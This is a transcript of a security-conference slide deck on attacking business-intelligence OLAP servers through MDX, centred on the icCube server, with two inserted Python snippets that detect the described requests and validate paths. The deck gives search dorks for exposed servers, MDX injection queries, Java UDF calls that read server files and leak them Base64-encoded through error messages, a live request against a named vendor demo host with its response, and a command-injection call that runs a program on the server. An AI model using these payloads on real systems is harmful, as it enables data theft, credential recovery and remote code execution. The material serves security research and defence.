Dmitry Chastukhin - Business Intelligence hacking – Breaking ICCube

  1. Invest in security to secure investments
     BI hacking – Breaking ICCube
     Dmitry Chastukhin – Director of SAP pentest/research team
  2. Dmitry "chipik" Chastuhin
     • Yet another security researcher
     • Business application security expert
     • I hate the words "backroom talk" and "colleagues"
  3. OLAP & Big Data
  4. WTH is OLAP?
     • Online analytical processing (OLAP) is an approach to formulate and answer multidimensional queries to large datasets.
     • OLAP technologies have been developed by many software giants since the 1990s.
     • Business intelligence (BI) is a methodology that helps managers analyse information inside and outside the company.
     • OLAP is all about BI and Big Data.
  5. Usage areas: Big Data, Retail, Government, Energy, Healthcare, Advertising
  6. Main players of the OLAP industry (vendor logos, no text)
  7. Google dorks
     Many of these servers can be accessed directly from the Web; here are some dorks:
         Service                                    Dork
         Pentaho Business Analytics XMLA interface  inurl:/mondrian/testpage.jsp  inurl:/pentaho/testpage.jsp
         Pentaho Business Analytics                 intitle:"Pentaho User Console Login"
         ISAPI MS Analysis Services                 inurl:msmdpump.dll
         SAP NetWeaver                              inurl:/sap/bc/bsp
         Oracle Essbase                             intitle:"Hyperion System 9" inurl:asp
  8. A quick glance… And here they are: (screenshots of exposed servers)
  9. A quick glance… (screenshots)
  10. Basic entities
     Simple table (figure): Date, Country, City, Customer, Supplier, Product, Route, with totals by Country, Cities and Supplier.
     What if we need to get totals by countries and suppliers vs. cities? Can we really do it in 2D?
  11. So what?
     • We're in N dimensions!
  12. Cube will help!
  13. MDX
  14. WTH is MDX?
     • SQL isn't convenient for accessing Big Data.
     • MDX (MultiDimensional eXpressions) comes to replace it.
     • MDX looks like SQL, but it's not SQL:
       – (usually) you can't modify data
       – MDX is much stricter than SQL
  15. MDX query form
         [ WITH <SELECT WITH clause>
           [ , <SELECT WITH clause> ...n ] ]
         SELECT
           [ * | ( <SELECT query axis clause>
                   [ , <SELECT query axis clause> ...n ] ) ]
         FROM <SELECT subcube clause>
         [ <SELECT slicer axis clause> ]
         [ <SELECT cell property list clause> ]
  16. MDX SELECT query sample
         WITH
           MEMBER SelectedMeasure AS ([Measures].[Salary Paid])
         SELECT
           { [SelectedMeasure] } ON COLUMNS,
           { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].[M]) } ON ROWS
         FROM [HR]
         WHERE ([Store].[Store].AllMembers)
  17. MDX processing (diagram; labels: Application, MDX, mdXML, OLAP, Data (SQL?), OLTP, Data)
  18. Attacks on MDX
     • mdXML attacks (good old XXE and much more)
     • MDX injections
     • User-defined function attacks
  19. MDX Injections
  20. What will help to inject?
     • Comments:
       – single line: -- (as in SQL)
       – multiline: /* … */
     • Special functions for crawling dimensions and members: Parent, FirstChild, LastChild, DefaultMember, etc.
     • Subqueries in FROM ( … )
  21. Where to inject?
         WITH
           MEMBER SelectedMeasure AS ([Measures].[Salary Paid])
         SELECT                                                   <- here
           { [SelectedMeasure] } ON COLUMNS,
           { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].[M]) <- here } ON ROWS
         FROM [HR]                                                <- here
         WHERE ([Store].[Store].AllMembers)
  22. Types of injections
     Pre-SELECT (WITH):
     • You can do everything
     In-SELECT:
     • Partial cube info gathering and cross-cube queries
     • Partial access to cube data
     In-WHERE:
     • Blind MDX
  23. Pre-SELECT injection
         WITH
           MEMBER SelectedMeasure AS ([Measures].[Salary Paid]
           MEMBER [Rank] AS ( Rank([Employee].[Employee].currentmember, Head([Employee].[Employee].members, Dimensions.count-1)) )
           MEMBER HierName AS ( Dimensions([Rank]).uniquename )
         SELECT
           {[Rank], [HierName]} on 0,
           {Head([Employee].[Employee].members, Dimensions.count-1)} on 1
         FROM [HR] /* [Salary Paid]) SELECT { [SelectedMeasure] ...rest of query...
  24. In-SELECT injection
         WITH
           MEMBER SelectedMeasure AS ([Measures].[Salary Paid])
         SELECT
           { [SelectedMeasure] } ON COLUMNS,
           { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].AllMembers, [User name].[User name].AllMembers) } ON ROWS
         FROM [HR]
         WHERE ([Store].[Store].AllMembers) /* [M]) } ... rest of request ...
  25. MDX Tips & Tricks (1)
     • Use {null} on an axis to get all or nothing
     • You can use Dimensions to access cube dimensions
     • LOOKUPCUBE provides access to another cube
     • You can use a /* multiline comment without the closing '*/'
     • Use DESCENDANTS to get all data about a member
     • You can convert to/from strings to pass data within a query
  26. Modifying data with MDX
     Normally, you can't modify data with MDX:
     • MDX was created for data extraction, not modification.
     • ALTER, CREATE and DROP are used for operations on measures and temporary sets, not for changing cube data.
     But in rare cases you can modify data with the UPDATE statement.
  27. MDX Update Query
     Simple update query:
         UPDATE CUBE [Sales] SET
           ([Geography].[Geo].[Europe], [Measures].[Amount]) = 20
     So, if you control the whole query AND data modification in the cube is enabled, you can modify data in any cube you have permission to access.
  28. MDX UDF
  29. User-Defined Function
     User-defined functions (UDFs) are functions written by the user or a third-party developer which can take and return values in MDX syntax. Call form:
         «ProgramID»!«FunctionName»(«Argument1», «Argument2», ...)
  30. Attack on UDF. IcCube OLAP Server
     • Popular OLAP server
     • Free; has a Community edition
     • Cross-platform Java app: Windows, Linux
     • Fast
     • Has many utilities: IDE, web reports
     • etc.
  31. IcCube OLAP Server (screenshot)
  32. IcCube OLAP Server (screenshot)
  33. IcCube OLAP Server
     • Of course icCube uses MDX, but where?
     • Send some request in WebReport and look in Burp
  34. IcCube OLAP Server
         POST /icCube/gvi
         action=executeMdx&mdx=SELECT { {[Measures].[Cashflow (M)],[Measures].[Cumulative Cashflow (M)]} } ON COLUMNS,
           { [Calendar].[Calendar].[Quarter].allmembers } ON ROWS
         FROM ( SELECT
           { {[Product Type].[Product Type].[Product Type-L].&[Fixed Income I],
              [Product Type].[Product Type].[Product Type-L].&[Fixed Income II],
              [Product Type].[Product Type].[Product Type-L].&[Saving Account],
              [Product Type].[Product Type].[Product Type-L].&[Fixed Income Derivative I],
              [Product Type].[Product Type].[Product Type-L].&[Fixed Income Derivative II],
              [Product Type].[Product Type].[Product Type-L].&[Other]} } ON 0,
           { {[Currency].[Currency].[Currency-L].&[121], [Currency].[Currency].[Currency-L].&[114],
              [Currency].[Currency].[Currency-L].&[119], [Currency].[Currency].[Currency-L].&[115],
              [Currency].[Currency].[Currency-L].&[133], [Currency].[Currency].[Currency-L].&[130],
              [Currency].[Currency].[Currency-L].&[122], [Currency].[Currency].[Currency-L].&[128],
              [Currency].[Currency].[Currency-L].&[124], [Currency].[Currency].[Currency-L].&[125],
              [Currency].[Currency].[Currency-L].&[123], [Currency].[Currency].[Currency-L].&[118],
              [Currency].[Currency].[Currency-L].&[126], [Currency].[Currency].[Currency-L].&[131],
              [Currency].[Currency].[Currency-L].&[116], [Currency].[Currency].[Currency-L].&[117],
              [Currency].[Currency].[Currency-L].&[132], [Currency].[Currency].[Currency-L].&[127],
              [Currency].[Currency].[Currency-L].&[120]} } ON 1,
           { {[Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[1],
              [Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[2],
              [Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[3]} } ON 2,
           { {[Profit Unit].[Profit Unit].[Profit Unit-L1].&[-],
              [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Corporate],
              [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Debt],
              [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Funding],
              [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Investments],
              [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Special Purpose]} } ON 3
         FROM [Cube])&schema=Bank I&tqx=out:json
  35. IcCube OLAP Server
     • Try to use user-defined functions
     • As we remember, icCube is a Java application
     • Let's try Java functions:
         J!Math.PI
  36. IcCube OLAP Server (screenshot)
  37. IcCube OLAP Server
     • Probably we can call public static Java functions. Cool.
         J!System.getProperty("user.dir")
  38. IcCube OLAP Server
     • icCube developers restrict access from user-defined functions to dangerous Java functions
     • From MDX, we can use some Java classes like Math …
     • … and "if you need JAVA classes from JAR that are not available with icCube, simply add them to the icCube-install/lib directory" (c) www.iccube.com
  39. IcCube OLAP Server
     • The icCube-install/lib directory contains a lot of interesting .jar files with interesting functions which we can call. For example:
         org.apache.commons.io.FileUtils.readFileToString(File file)
       from commons-io-1.4.jar
  40. UDF. IcCube OLAP Server
     • Let's try to read the file c:/111.txt from the server, which contains the text "hello_MDX"
     • To get the result back, we can use error messages:
         J!org.apache.commons.io.FileUtils.readFileToString(J!File("c:/111.txt"))
     • Final MDX request:
         SELECT {StrToTuple(J!org.apache.commons.io.FileUtils.readFileToString(J!File("c:/111.txt")))} ON COLUMNS FROM [Sales]
  41. UDF. IcCube OLAP Server (screenshot)
  42. UDF. IcCube OLAP Server
     • But if the file contains special characters or even whitespace, the MDX parser won't return its content
     • For example, if we try to read the file "hello_MDX blabla", we get this error: "syntax error: unexpected statement 'blabla' (REGULAR_IDENTIFIER)"
  43. UDF. IcCube OLAP Server
     • OK, just encode the file content; Base64, for example
     • We found a method: org.apache.commons.codec.binary.Base64.encodeBase64(byte[] binaryData) in commons-codec-1.6.jar
     • Tried it… and got the error: syntax error: unexpected statement 'EQ'
  44. UDF. IcCube OLAP Server
     • Hmm, probably the Base64 string contained an 'EQ' sequence, which means "equivalent"
     • OK, encoded the file content twice…
     • …and got the error: syntax error: missing expression following '='
  45. UDF. IcCube OLAP Server
     • Oh, the "=" symbol is often found in Base64 strings
     • To resolve this problem, just concatenate the Base64 string which contains "=" with one letter:
         MTIzNDU=s
       When the MDX parser works, it drops "=" and all symbols after it. But since "=" is always at the end of Base64, we can still decode it.
  46. UDF. IcCube OLAP Server
     • Final user-defined function call:
         StrToTuple(J!org.apache.commons.codec.binary.Base64.encodeBase64(J!org.apache.commons.codec.binary.Base64.encodeBase64(J!org.apache.commons.io.FileUtils.readFileToByteArray(J!File("c:/111.txt"))))+"s")
  47. UDF. IcCube OLAP Server
     Decode WVVkV2MySkhPV1pVVlZKWlNVZEtjMWxYU25OWlVUMDk=
  48. UDF. IcCube OLAP Server
     • We must not forget to add "=" at the end of the Base64 string because the MDX parser has trimmed it
     • After decoding, we got the text from the file c:/111.txt
  49. UDF. IcCube OLAP Server
     This vulnerability is very interesting, especially because user passwords in icCube OLAP Server are stored as Base64-encoded strings in the file icCubeUsers.icc-users:
         <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
         <users>
           <user name="admin" password="☁YWRtaW4=">
             <role>administrator</role>
           </user>
           <user password="☁ZGVtbw==" name="demo">
             <role>standard</role>
           </user>
           <user name="marc" password="☁bWFyYw==">
             <role>standard</role>
             <role>administrator</role>
           </user>
         </users>
  50. UDF. IcCube OLAP Server
     • Example: getting the user home directory from the icCube demo server demo3.iccube.com
         POST /icCube/gvi HTTP/1.1
         Host: demo3.iccube.com

         action=executeMdx&mdx=SELECT{StrToTuple(J!crazydev.common.security.Base64Encoder.encodeString(J!crazydev.common.utils.CdSystemUtils.getStringProperty("user.home","aaa"))%2b"ss")}+ON+COLUMNS,{[Calendar].[Calendar].allmembers+}+ON+ROWS+FROM+[Cube]&schema=Bank+I&tqx=out%3Ajson
  51. UDF. IcCube OLAP Server
         HTTP/1.1 200 OK
         {version:'0.6',status:'error',errors:[{reason:'other',message:'\u0027\u0027L2hvbWUvZGVtbzM\u0027 is neither a dimension nor a hierarchy within the cube.\u0027 is neither a dimension nor a hierarchy within the cube.',detailed_message:'SELECT{StrToTuple(J!crazydev.common.security.Base64Encoder.encodeString(J!crazydev.common.utils.CdSystemUtils.getStringProperty(\u0022user.home\u0022,\u0022aaa\u0022))+\u0022ss\u0022)} ON COLUMNS,\r\n{[Calendar].[Calendar].allmembers } ON ROWS\r\n FROM [Cube]\r\n',error_code:'OLAP_UNKNOWN_DIMENSION_HIERARCHY'}]}
     After decoding "L2hvbWUvZGVtbzM=", we get "/home/demo3".
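Defender's view of slides 20 to 25 and 40 to 51, as an added example that is not part of the deck, of ERPScan's tooling or of icCube: a small Python checker that pulls the mdx= parameter out of /icCube/gvi request bodies, flags the J! UDF calls, the StrToTuple(J!...) error channel and unterminated /* comments described above, and recovers a value leaked through an OLAP_UNKNOWN_DIMENSION_HIERARCHY error by re-adding the "=" padding the parser trims and peeling the nested Base64. The sample request bodies and error message are constructed; the regexes and the list of high-risk class prefixes are my assumptions, not icCube's rules.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# Indicators taken from the techniques in the deck: Java UDF calls (J!...), the
# StrToTuple(J!...) wrapper that leaks a result through the parser's error text,
# and an opened /* comment with no closing */ that swallows the rest of a query.
UDF_CALL = re.compile(r"J!([A-Za-z_][\w.]*)\s*\(")
ERROR_CHANNEL = re.compile(r"StrToTuple\s*\(\s*J!", re.IGNORECASE)
OPEN_COMMENT = re.compile(r"/\*(?![\s\S]*\*/)")
# Class prefixes the deck shows being reached through UDFs (assumed list; Math.* is the legitimate case).
HIGH_RISK_PREFIXES = ("System.", "File", "org.apache.commons.io.",
                      "org.apache.commons.codec.", "crazydev.common.")
# Shape of the OLAP_UNKNOWN_DIMENSION_HIERARCHY message that echoes a probe's result.
LEAKED_TOKEN = re.compile(r"'([A-Za-z0-9+/]+)' is neither a dimension")

def extract_mdx(post_body: str) -> str:
    """Pull the mdx= parameter out of an /icCube/gvi form body (decodes %2b, + ...)."""
    return parse_qs(post_body).get("mdx", [""])[0]

def classify_mdx(mdx: str) -> dict:
    """Report which UDF/injection indicators one MDX statement contains."""
    calls = UDF_CALL.findall(mdx)
    return {
        "udf_calls": calls,
        "high_risk": [c for c in calls if c.startswith(HIGH_RISK_PREFIXES)],
        "error_channel": bool(ERROR_CHANNEL.search(mdx)),
        "unterminated_comment": bool(OPEN_COMMENT.search(mdx)),
    }

def peel_base64(value: str, max_rounds: int = 4) -> str:
    """Re-add the '=' padding the MDX parser trimmed, then decode nested Base64 layers
    until a layer fails to decode or decodes to non-printable bytes (a heuristic)."""
    current = value
    for _ in range(max_rounds):
        if len(current) % 4 == 1:          # no Base64 string has this length
            break
        padded = current + "=" * (-len(current) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break                          # plain text (spaces, '_', ...) ends here
        if not decoded.isprintable():
            break                          # went past the text into binary
        current = decoded
    return current

def leaked_value_from_error(message: str) -> str:
    """Recover the value a StrToTuple(J!...) probe leaked through the error text."""
    match = LEAKED_TOKEN.search(message)
    return peel_base64(match.group(1)) if match else ""

def scan_bodies(bodies) -> list:
    """Classify every body whose mdx= parameter carries a UDF call."""
    return [classify_mdx(extract_mdx(b)) for b in bodies if "J!" in extract_mdx(b)]

# Constructed sample traffic modelled on the deck's requests (not captured data):
# a plain WebReport query and a UDF probe like the one shown against demo3.
SAMPLE_BODIES = [
    "action=executeMdx&mdx=SELECT+{[Measures].[Cashflow+(M)]}+ON+COLUMNS+FROM+[Cube]&schema=Bank+I&tqx=out%3Ajson",
    "action=executeMdx&mdx=SELECT{StrToTuple(J!crazydev.common.security.Base64Encoder.encodeString("
    "J!crazydev.common.utils.CdSystemUtils.getStringProperty(%22user.home%22,%22aaa%22))%2b%22ss%22)}"
    "+ON+COLUMNS+FROM+[Cube]&schema=Bank+I&tqx=out%3Ajson",
]
SAMPLE_ERROR = "''L2hvbWUvZGVtbzM' is neither a dimension nor a hierarchy within the cube."
```

Feeding scan_bodies the bodies of POSTs to /icCube/gvi from a proxy or application log gives one report per request that carries a J! call; any hit on high_risk or error_channel is worth an alert, and peel_base64 tells the responder what the echoed token actually was.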
  52. UDF. IcCube OLAP Server
     DEMO
  53. UDF. IcCube OLAP Server
     • But dangerous Java methods are only half of the problem
     • Dangerous Java methods with bugs are another thing the attacker can use
     • Method org.apache.commons.io.FileSystemUtils.freeSpaceWindows(String path) from commons-io-1.4.jar
  54. UDF. IcCube OLAP Server
     • The variable "path" is used as a parameter in the command "cmd.exe /C dir /-c path"
     • The variable "path" isn't checked, which is why an attacker can inject operating system commands
     This is the user-defined function call which executes calc.exe on the server OS:
         J!FileSystemUtils.freeSpace("& calc.exe")
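As an added illustration of the unchecked-argument bug on slides 53 and 54 (constructed code, not commons-io's implementation and not icCube's fix): the shell line is built the same way the deck describes, and the hardened variant refuses any argument that is not a plain drive-rooted Windows path before it reaches cmd.exe /C. The path regex is my assumption about what a free-space query should accept.

```python
import re

# Constructed model of the commons-io 1.4 pattern the deck describes:
# freeSpaceWindows(path) hands "dir /-c " + path to cmd.exe /C with no validation,
# so "& calc.exe" becomes a second command on the same shell line.
def vulnerable_dir_command(path: str) -> list:
    return ["cmd.exe", "/C", "dir /-c " + path]

# cmd.exe /C re-parses its single argument, so building an argv list does not help;
# the argument must be validated before it reaches the shell line. The character
# class below excludes every cmd.exe metacharacter (& | < > ^ % ! ") as well as the
# characters that are illegal in Windows file names anyway.
DRIVE_PATH = re.compile(r'^[A-Za-z]:\\(?:[^\\/:*?"<>|&^%!\r\n]+\\?)*$')

def is_safe_windows_path(path: str) -> bool:
    """True only for drive-rooted paths made of plain directory names."""
    return DRIVE_PATH.fullmatch(path) is not None

def hardened_dir_command(path: str) -> list:
    """Same command, but only after the argument passed the allow-list check."""
    if not is_safe_windows_path(path):
        raise ValueError(f"refusing path argument with shell metacharacters: {path!r}")
    return ["cmd.exe", "/C", 'dir /-c "' + path + '"']
```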
  55. UDF. IcCube OLAP Server
     DEMO
  56. Conclusion
     • MDX is a very popular language
     • At this moment we don't have an alternative language for multidimensional data requests
     • All developers forget about MDX security. Back to 2000
     • Security issues in MDX may cause a lot of attacks: data stealing, file reading, privilege escalation, remote code execution, SQL injection, cross-site scripting, etc.
  57. Web: www.erpscan.com
     e-mail: info@erpscan.com
     Twitter: @erpscan, @_chipik, @dark_k3y
